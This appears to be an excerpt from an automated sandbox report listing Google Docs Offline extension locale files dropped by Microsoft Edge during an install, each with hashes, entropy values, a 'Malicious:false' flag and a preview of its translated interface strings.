                                                                                                                                                                                                                                                                                                                  Size (bytes):1672
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.314484457325167
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:48:46G2+ymELbLNzGVx/hXdDtxSRhqv7Qm6/7Lm:4GbxzGVzXdDtx+qzU/7C
                                                                                                                                                                                                                                                                                                                  MD5:98A7FC3E2E05AFFFC1CFE4A029F47476
                                                                                                                                                                                                                                                                                                                  SHA1:A17E077D6E6BA1D8A90C1F3FAF25D37B0FF5A6AD
                                                                                                                                                                                                                                                                                                                  SHA-256:D2D1AFA224CDA388FF1DC8FAC24CDA228D7CE09DE5D375947D7207FA4A6C4F8D
                                                                                                                                                                                                                                                                                                                  SHA-512:457E295C760ABFD29FC6BBBB7FC7D4959287BCA7FB0E3E99EB834087D17EED331DEF18138838D35C48C6DDC8A0134AFFFF1A5A24033F9B5607B355D3D48FDF88
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "... .....".. },.. "explanationofflinedisabled": {.. "message": ".. ...... .... ....... ....... .. .... Google ........ .. ..... .... .. ..., .... ... ....... .. ...... .... .. Google ........ .. ........ .. ...... ... .... .. ...... ....... .... .....".. },.. "explanationofflineenabled": {.. "message": ".. ...... ..., ..... .. .. .. ...... ...... ..... .. .... ... .. .. ...... ... .... ....".. },.. "extdesc": {.. "message": ".... .... ....... ...... ..

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir6596_799178386\CRX_INSTALL\_locales\hr\messages.json

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):935
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.6369398601609735
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HA7sR5k/I+UX/hrcySxG1fIZ3tp/S/d6Gpb+D:YsE/I+UX/hVSxQ03f/Sj+D
                                                                                                                                                                                                                                                                                                                  MD5:25CDFF9D60C5FC4740A48EF9804BF5C7
                                                                                                                                                                                                                                                                                                                  SHA1:4FADECC52FB43AEC084DF9FF86D2D465FBEBCDC0
                                                                                                                                                                                                                                                                                                                  SHA-256:73E6E246CEEAB9875625CD4889FBF931F93B7B9DEAA11288AE1A0F8A6E311E76
                                                                                                                                                                                                                                                                                                                  SHA-512:EF00B08496427FEB5A6B9FB3FE2E5404525BE7C329D9DD2A417480637FD91885837D134A26980DCF9F61E463E6CB68F09A24402805807E656AF16B116A75E02C
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "IZRADI NOVI".. },.. "explanationofflinedisabled": {.. "message": "Vi ste izvan mre.e. Da biste koristili Google dokumente bez internetske veze, idite na postavke na po.etnoj stranici Google dokumenata i uklju.ite izvanmre.nu sinkronizaciju sljede.i put kada se pove.ete s internetom.".. },.. "explanationofflineenabled": {.. "message": "Vi ste izvan mre.e, no i dalje mo.ete ure.ivati dostupne datoteke i izra.ivati nove.".. },.. "extdesc": {.. "message": "Uredite, izradite i pregledajte dokumente, prora.unske tablice i prezentacije . sve bez pristupa internetu.".. },.. "extname": {.. "message": "Google dokumenti izvanmre.no".. },.. "learnmore": {.. "message": "Saznajte vi.e".. },.. "popuphelptext": {.. "message": "Pi.ite, ure.ujte i sura.ujte gdje god se nalazili, povezani s internetom ili izvanmre.no.".. }..}..

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir6596_799178386\CRX_INSTALL\_locales\hu\messages.json

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1065
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.816501737523951
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HA6J54gEYwFFMxv4gvyB9FzmxlsN147g/zJcYwJgrus4QY2jom:NJ54gEYwUmgKHFzmsG7izJcYOgKgYjm
                                                                                                                                                                                                                                                                                                                  MD5:8930A51E3ACE3DD897C9E61A2AEA1D02
                                                                                                                                                                                                                                                                                                                  SHA1:4108506500C68C054BA03310C49FA5B8EE246EA4
                                                                                                                                                                                                                                                                                                                  SHA-256:958C0F664FCA20855FA84293566B2DDB7F297185619143457D6479E6AC81D240
                                                                                                                                                                                                                                                                                                                  SHA-512:126B80CD3428C0BC459EEAAFCBE4B9FDE2541A57F19F3EC7346BAF449F36DC073A9CF015594A57203255941551B25F6FAA6D2C73C57C44725F563883FF902606
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": ".J L.TREHOZ.SA".. },.. "explanationofflinedisabled": {.. "message": "Jelenleg offline .llapotban van. Ha a Google Dokumentumokat internetkapcsolat n.lk.l szeretn. haszn.lni, a legk.zelebbi internethaszn.lata sor.n nyissa meg a Google Dokumentumok kezd.oldal.n tal.lhat. be.ll.t.sokat, .s tiltsa le az offline szinkroniz.l.s be.ll.t.st.".. },.. "explanationofflineenabled": {.. "message": "Offline .llapotban van, de az el.rhet. f.jlokat .gy is szerkesztheti, valamint l.trehozhat .jakat.".. },.. "extdesc": {.. "message": "Szerkesszen, hozzon l.tre .s tekintsen meg dokumentumokat, t.bl.zatokat .s prezent.ci.kat . ak.r internetkapcsolat n.lk.l is.".. },.. "extname": {.. "message": "Google Dokumentumok Offline".. },.. "learnmore": {.. "message": "Tov.bbi inform.ci.".. },.. "popuphelptext": {.. "message": ".rjon, szerkesszen .s dolgozzon egy.tt m.sokkal

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir6596_799178386\CRX_INSTALL\_locales\hy\messages.json

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):2771
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.7629875118570055
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:48:Y0Fx+eiYZBZ7K1ZZ/5QQxTuDLoFZaIZSK7lq0iC0mlMO6M3ih1oAgC:lF2BTz6N/
                                                                                                                                                                                                                                                                                                                  MD5:55DE859AD778E0AA9D950EF505B29DA9
                                                                                                                                                                                                                                                                                                                  SHA1:4479BE637A50C9EE8A2F7690AD362A6A8FFC59B2
                                                                                                                                                                                                                                                                                                                  SHA-256:0B16E3F8BD904A767284345AE86A0A9927C47AFE89E05EA2B13AD80009BDF9E4
                                                                                                                                                                                                                                                                                                                  SHA-512:EDAB2FCC14CABB6D116E9C2907B42CFBC34F1D9035F43E454F1F4D1F3774C100CBADF6B4C81B025810ED90FA91C22F1AEFE83056E4543D92527E4FE81C7889A8
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"\u054d\u054f\u0535\u0542\u053e\u0535\u053c \u0546\u0548\u0550"},"explanationofflinedisabled":{"message":"Google \u0553\u0561\u057d\u057f\u0561\u0569\u0572\u0569\u0565\u0580\u0568 \u0576\u0561\u0587 \u0561\u0576\u0581\u0561\u0576\u0581 \u057c\u0565\u056a\u056b\u0574\u0578\u0582\u0574 \u0585\u0563\u057f\u0561\u0563\u0578\u0580\u056e\u0565\u056c\u0578\u0582 \u0570\u0561\u0574\u0561\u0580 \u0574\u056b\u0561\u0581\u0565\u0584 \u0570\u0561\u0574\u0561\u0581\u0561\u0576\u0581\u056b\u0576, \u0562\u0561\u0581\u0565\u0584 \u056e\u0561\u057c\u0561\u0575\u0578\u0582\u0569\u0575\u0561\u0576 \u0563\u056c\u056d\u0561\u057e\u0578\u0580 \u0567\u057b\u0568, \u0561\u0576\u0581\u0565\u0584 \u056f\u0561\u0580\u0563\u0561\u057e\u0578\u0580\u0578\u0582\u0574\u0576\u0565\u0580 \u0587 \u0574\u056b\u0561\u0581\u0580\u0565\u0584 \u0561\u0576\u0581\u0561\u0576\u0581 \u0570\u0561\u0574\u0561\u056a\u0561\u0574\u0561\u0581\u0578\u0582\u0574\u0568:"},"explanationofflineenabled":{"message":"\u

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir6596_799178386\CRX_INSTALL\_locales\id\messages.json

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):858
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.474411340525479
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvgJX4CBxNpXemNOAJRFqjRpCBxedIdjTi92OvbCSUuoi01uRwCBhUuvz1thK:1HARXzhXemNOQWGcEoeH1eXJNvT2
                                                                                                                                                                                                                                                                                                                  MD5:34D6EE258AF9429465AE6A078C2FB1F5
                                                                                                                                                                                                                                                                                                                  SHA1:612CAE151984449A4346A66C0A0DF4235D64D932
                                                                                                                                                                                                                                                                                                                  SHA-256:E3C86DDD2EFEBE88EED8484765A9868202546149753E03A61EB7C28FD62CFCA1
                                                                                                                                                                                                                                                                                                                  SHA-512:20427807B64A0F79A6349F8A923152D9647DA95C05DE19AD3A4BF7DB817E25227F3B99307C8745DD323A6591B515221BD2F1E92B6F1A1783BDFA7142E84601B1
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "BUAT BARU".. },.. "explanationofflinedisabled": {.. "message": "Anda sedang offline. Untuk menggunakan Google Dokumen tanpa koneksi internet, buka setelan di beranda Google Dokumen dan aktifkan sinkronisasi offline saat terhubung ke internet.".. },.. "explanationofflineenabled": {.. "message": "Anda sedang offline, namun Anda masih dapat mengedit file yang tersedia atau membuat file baru.".. },.. "extdesc": {.. "message": "Edit, buat, dan lihat dokumen, spreadsheet, dan presentasi . tanpa perlu akses internet.".. },.. "extname": {.. "message": "Google Dokumen Offline".. },.. "learnmore": {.. "message": "Pelajari Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit, dan gabungkan di mana saja, dengan atau tanpa koneksi internet.".. }..}..

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir6596_799178386\CRX_INSTALL\_locales\is\messages.json

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):954
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.6457079159286545
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:12:YGXU2rOcxGe+J97M9TP2DBX9tMfxqbTMvOfWWgdraqlifVpm0Ekf95Mw89KkJ+je:YwBrD2g2DBLMfFuWvdpY94viDO+uh
                                                                                                                                                                                                                                                                                                                  MD5:CAEB37F451B5B5E9F5EB2E7E7F46E2D7
                                                                                                                                                                                                                                                                                                                  SHA1:F917F9EAE268A385A10DB3E19E3CC3ACED56D02E
                                                                                                                                                                                                                                                                                                                  SHA-256:943E61988C859BB088F548889F0449885525DD660626A89BA67B2C94CFBFBB1B
                                                                                                                                                                                                                                                                                                                  SHA-512:A55DEC2404E1D7FA5A05475284CBECC2A6208730F09A227D75FDD4AC82CE50F3751C89DC687C14B91950F9AA85503BD6BF705113F2F1D478E728DF64D476A9EE
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"B\u00daA TIL N\u00ddTT"},"explanationofflinedisabled":{"message":"\u00de\u00fa ert \u00e1n nettengingar. Til a\u00f0 nota Google-skj\u00f6l \u00e1n nettengingar skaltu opna stillingarnar \u00e1 heimas\u00ed\u00f0u Google skjala og virkja samstillingu \u00e1n nettengingar n\u00e6st \u00feegar \u00fe\u00fa tengist netinu."},"explanationofflineenabled":{"message":"Engin nettenging. \u00de\u00fa getur samt sem \u00e1\u00f0ur breytt tilt\u00e6kum skr\u00e1m e\u00f0a b\u00fai\u00f0 til n\u00fdjar."},"extdesc":{"message":"Breyttu, b\u00fa\u00f0u til og sko\u00f0a\u00f0u skj\u00f6lin \u00fe\u00edn, t\u00f6flureikna og kynningar \u2014 allt \u00e1n nettengingar."},"extname":{"message":"Google-skj\u00f6l \u00e1n nettengingar"},"learnmore":{"message":"Frekari uppl\u00fdsingar"},"popuphelptext":{"message":"Skrifa\u00f0u, breyttu og starfa\u00f0u me\u00f0 \u00f6\u00f0rum hvort sem nettenging er til sta\u00f0ar e\u00f0a ekki."}}.

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir6596_799178386\CRX_INSTALL\_locales\it\messages.json

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):899
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.474743599345443
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvggrCBxNp8WJOJJrJ3WytVCBxep3bjP5CSUCjV8AgJJm2CBhr+z1tWgjqEOW:1HANXJOTBFtKa8Agju4NB3j
                                                                                                                                                                                                                                                                                                                  MD5:0D82B734EF045D5FE7AA680B6A12E711
                                                                                                                                                                                                                                                                                                                  SHA1:BD04F181E4EE09F02CD53161DCABCEF902423092
                                                                                                                                                                                                                                                                                                                  SHA-256:F41862665B13C0B4C4F562EF1743684CCE29D4BCF7FE3EA494208DF253E33885
                                                                                                                                                                                                                                                                                                                  SHA-512:01F305A280112482884485085494E871C66D40C0B03DE710B4E5F49C6A478D541C2C1FDA2CEAF4307900485946DEE9D905851E98A2EB237642C80D464D1B3ADA
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CREA NUOVO".. },.. "explanationofflinedisabled": {.. "message": "Sei offline. Per utilizzare Documenti Google senza una connessione Internet, apri le impostazioni nella home page di Documenti Google e attiva la sincronizzazione offline la prossima volta che ti colleghi a Internet.".. },.. "explanationofflineenabled": {.. "message": "Sei offline, ma puoi comunque modificare i file disponibili o crearne di nuovi.".. },.. "extdesc": {.. "message": "Modifica, crea e visualizza documenti, fogli di lavoro e presentazioni, senza accesso a Internet.".. },.. "extname": {.. "message": "Documenti Google offline".. },.. "learnmore": {.. "message": "Ulteriori informazioni".. },.. "popuphelptext": {.. "message": "Scrivi, modifica e collabora ovunque ti trovi, con o senza una connessione Internet.".. }..}..

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir6596_799178386\CRX_INSTALL\_locales\iw\messages.json

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):2230
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.8239097369647634
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:YIiTVLrLD1MEzMEH82LBLjO5YaQEqLytLLBm3dnA5LcqLWAU75yxFLcx+UxWRJLI:YfTFf589rZNgNA12Qzt4/zRz2vc
                                                                                                                                                                                                                                                                                                                  MD5:26B1533C0852EE4661EC1A27BD87D6BF
                                                                                                                                                                                                                                                                                                                  SHA1:18234E3ABAF702DF9330552780C2F33B83A1188A
                                                                                                                                                                                                                                                                                                                  SHA-256:BBB81C32F482BA3216C9B1189C70CEF39CA8C2181AF3538FFA07B4C6AD52F06A
                                                                                                                                                                                                                                                                                                                  SHA-512:450BFAF0E8159A4FAE309737EA69CA8DD91CAAFD27EF662087C4E7716B2DCAD3172555898E75814D6F11487F4F254DE8625EF0CFEA8DF0133FC49E18EC7FD5D2
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"\u05d9\u05e6\u05d9\u05e8\u05ea \u05d7\u05d3\u05e9"},"explanationofflinedisabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8. \u05db\u05d3\u05d9 \u05dc\u05d4\u05e9\u05ea\u05de\u05e9 \u05d1-Google Docs \u05dc\u05dc\u05d0 \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d1\u05d4\u05ea\u05d7\u05d1\u05e8\u05d5\u05ea \u05d4\u05d1\u05d0\u05d4 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d9\u05e9 \u05dc\u05e2\u05d1\u05d5\u05e8 \u05dc\u05e7\u05d8\u05e2 \u05d4\u05d4\u05d2\u05d3\u05e8\u05d5\u05ea \u05d1\u05d3\u05e3 \u05d4\u05d1\u05d9\u05ea \u05e9\u05dc Google Docs \u05d5\u05dc\u05d4\u05e4\u05e2\u05d9\u05dc \u05e1\u05e0\u05db\u05e8\u05d5\u05df \u05d1\u05de\u05e6\u05d1 \u05d0\u05d5\u05e4\u05dc\u05d9\u05d9\u05df."},"explanationofflineenabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir6596_799178386\CRX_INSTALL\_locales\ja\messages.json

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1160
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.292894989863142
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAoc3IiRF1viQ1RF3CMP3rnicCCAFrr1Oo0Y5ReXCCQkb:Dc3zF7F3CMTnOCAFVLHXCFb
                                                                                                                                                                                                                                                                                                                  MD5:15EC1963FC113D4AD6E7E59AE5DE7C0A
                                                                                                                                                                                                                                                                                                                  SHA1:4017FC6D8B302335469091B91D063B07C9E12109
                                                                                                                                                                                                                                                                                                                  SHA-256:34AC08F3C4F2D42962A3395508818B48CA323D22F498738CC9F09E78CB197D73
                                                                                                                                                                                                                                                                                                                  SHA-512:427251F471FA3B759CA1555E9600C10F755BC023701D058FF661BEC605B6AB94CFB3456C1FEA68D12B4D815FFBAFABCEB6C12311DD1199FC783ED6863AF97C0F
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "....".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ............................... Google .............. [..] .......[.......] ...........".. },.. "explanationofflineenabled": {.. "message": ".............................................".. },.. "extdesc": {.. "message": ".........................................................".. },.. "extname": {.. "message": "Google ..... ......".. },.. "learnmore": {.. "message": "..".. },.. "popuphelp

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir6596_799178386\CRX_INSTALL\_locales\ka\messages.json

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):3264
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.586016059431306
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:48:YGFbhVhVn0nM/XGbQTvxnItVJW/476CFdqaxWNlR:HFbhV/n0MfGbw875FkaANlR
                                                                                                                                                                                                                                                                                                                  MD5:83F81D30913DC4344573D7A58BD20D85
                                                                                                                                                                                                                                                                                                                  SHA1:5AD0E91EA18045232A8F9DF1627007FE506A70E0
                                                                                                                                                                                                                                                                                                                  SHA-256:30898BBF51BDD58DB397FF780F061E33431A38EF5CFC288B5177ECF76B399F26
                                                                                                                                                                                                                                                                                                                  SHA-512:85F97F12AD4482B5D9A6166BB2AE3C4458A582CF575190C71C1D8E0FB87C58482F8C0EFEAD56E3A70EDD42BED945816DB5E07732AD27B8FFC93F4093710DD58F
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"\u10d0\u10ee\u10da\u10d8\u10e1 \u10e8\u10d4\u10e5\u10db\u10dc\u10d0"},"explanationofflinedisabled":{"message":"\u10d7\u10e5\u10d5\u10d4\u10dc \u10ee\u10d0\u10d6\u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10ee\u10d0\u10e0\u10d7. Google Docs-\u10d8\u10e1 \u10d8\u10dc\u10e2\u10d4\u10e0\u10dc\u10d4\u10e2\u10d7\u10d0\u10dc \u10d9\u10d0\u10d5\u10e8\u10d8\u10e0\u10d8\u10e1 \u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10d2\u10d0\u10db\u10dd\u10e1\u10d0\u10e7\u10d4\u10dc\u10d4\u10d1\u10da\u10d0\u10d3 \u10d2\u10d0\u10d3\u10d0\u10d3\u10d8\u10d7 \u10de\u10d0\u10e0\u10d0\u10db\u10d4\u10e2\u10e0\u10d4\u10d1\u10d6\u10d4 Google Docs-\u10d8\u10e1 \u10db\u10d7\u10d0\u10d5\u10d0\u10e0 \u10d2\u10d5\u10d4\u10e0\u10d3\u10d6\u10d4 \u10d3\u10d0 \u10e9\u10d0\u10e0\u10d7\u10d4\u10d7 \u10ee\u10d0\u10d6\u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10e1\u10d8\u10dc\u10e5\u10e0\u10dd\u10dc\u10d8\u10d6\u10d0\u10ea\u10d8\u10d0, \u10e0\u10dd\u10d3\u10d4\u10e1\u10d0\u10ea \u10e8\u10d4\u10db\u10d3\u10d2\u10dd\u10

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir6596_799178386\CRX_INSTALL\_locales\kk\messages.json

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):3235
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.6081439490236464
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:96:H3E+6rOEAbeHTln2EQ77Uayg45RjhCSj+OyRdM7AE9qdV:HXcR/nQXUayYV
                                                                                                                                                                                                                                                                                                                  MD5:2D94A58795F7B1E6E43C9656A147AD3C
                                                                                                                                                                                                                                                                                                                  SHA1:E377DB505C6924B6BFC9D73DC7C02610062F674E
                                                                                                                                                                                                                                                                                                                  SHA-256:548DC6C96E31A16CE355DC55C64833B08EF3FBA8BF33149031B4A685959E3AF4
                                                                                                                                                                                                                                                                                                                  SHA-512:F51CC857E4CF2D4545C76A2DCE7D837381CE59016E250319BF8D39718BE79F9F6EE74EA5A56DE0E8759E4E586D93430D51651FC902376D8A5698628E54A0F2D8
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"\u0416\u0410\u04a2\u0410\u0421\u042b\u041d \u0416\u0410\u0421\u0410\u0423"},"explanationofflinedisabled":{"message":"\u0421\u0456\u0437 \u043e\u0444\u043b\u0430\u0439\u043d \u0440\u0435\u0436\u0438\u043c\u0456\u043d\u0434\u0435\u0441\u0456\u0437. Google Docs \u049b\u043e\u043b\u0434\u0430\u043d\u0431\u0430\u0441\u044b\u043d \u0436\u0435\u043b\u0456 \u0431\u0430\u0439\u043b\u0430\u043d\u044b\u0441\u044b\u043d\u0441\u044b\u0437 \u049b\u043e\u043b\u0434\u0430\u043d\u0443 \u04af\u0448\u0456\u043d, \u043a\u0435\u043b\u0435\u0441\u0456 \u0436\u043e\u043b\u044b \u0436\u0435\u043b\u0456\u0433\u0435 \u049b\u043e\u0441\u044b\u043b\u0493\u0430\u043d\u0434\u0430, Google Docs \u043d\u0435\u0433\u0456\u0437\u0433\u0456 \u0431\u0435\u0442\u0456\u043d\u0435\u043d \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u043b\u0435\u0440 \u0431\u04e9\u043b\u0456\u043c\u0456\u043d \u043a\u0456\u0440\u0456\u043f, \u043e\u0444\u043b\u0430\u0439\u043d \u0440\u0435\u0436\u0438\u043c\u0456\u

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir6596_799178386\CRX_INSTALL\_locales\km\messages.json

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):3122
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.891443295908904
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:96:/OOrssRU6Bg7VSdL+zsCfoZiWssriWqo2gx7RRCos2sEeBkS7Zesg:H5GRZlXsGdo
                                                                                                                                                                                                                                                                                                                  MD5:B3699C20A94776A5C2F90AEF6EB0DAD9
                                                                                                                                                                                                                                                                                                                  SHA1:1F9B968B0679A20FA097624C9ABFA2B96C8C0BEA
                                                                                                                                                                                                                                                                                                                  SHA-256:A6118F0A0DE329E07C01F53CD6FB4FED43E54C5F53DB4CD1C7F5B2B4D9FB10E6
                                                                                                                                                                                                                                                                                                                  SHA-512:1E8D15B8BFF1D289434A244172F9ED42B4BB6BCB6372C1F300B01ACEA5A88167E97FEDABA0A7AE3BEB5E24763D1B09046AE8E30745B80E2E2FE785C94DF362F6
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"\u1794\u1784\u17d2\u1780\u17be\u178f\u200b\u1790\u17d2\u1798\u17b8"},"explanationofflinedisabled":{"message":"\u17a2\u17d2\u1793\u1780\u200b\u1782\u17d2\u1798\u17b6\u1793\u200b\u17a2\u17ca\u17b8\u1793\u1792\u17ba\u178e\u17b7\u178f\u17d4 \u178a\u17be\u1798\u17d2\u1794\u17b8\u200b\u1794\u17d2\u179a\u17be Google \u17af\u1780\u179f\u17b6\u179a\u200b\u1794\u17b6\u1793\u200b\u200b\u178a\u17c4\u1799\u200b\u200b\u1798\u17b7\u1793\u1798\u17b6\u1793\u200b\u200b\u200b\u17a2\u17ca\u17b8\u1793\u1792\u17ba\u178e\u17b7\u178f \u179f\u17bc\u1798\u200b\u200b\u1791\u17c5\u200b\u1780\u17b6\u1793\u17cb\u200b\u1780\u17b6\u179a\u200b\u1780\u17c6\u178e\u178f\u17cb\u200b\u1793\u17c5\u200b\u179b\u17be\u200b\u1782\u17c1\u17a0\u1791\u17c6\u1796\u17d0\u179a Google \u17af\u1780\u179f\u17b6\u179a \u1793\u17b7\u1784\u200b\u1794\u17be\u1780\u200b\u1780\u17b6\u179a\u1792\u17d2\u179c\u17be\u200b\u179f\u1798\u1780\u17b6\u179b\u1780\u1798\u17d2\u1798\u200b\u200b\u200b\u1782\u17d2\u1798\u17b6\u1793

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir6596_799178386\CRX_INSTALL\_locales\kn\messages.json

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
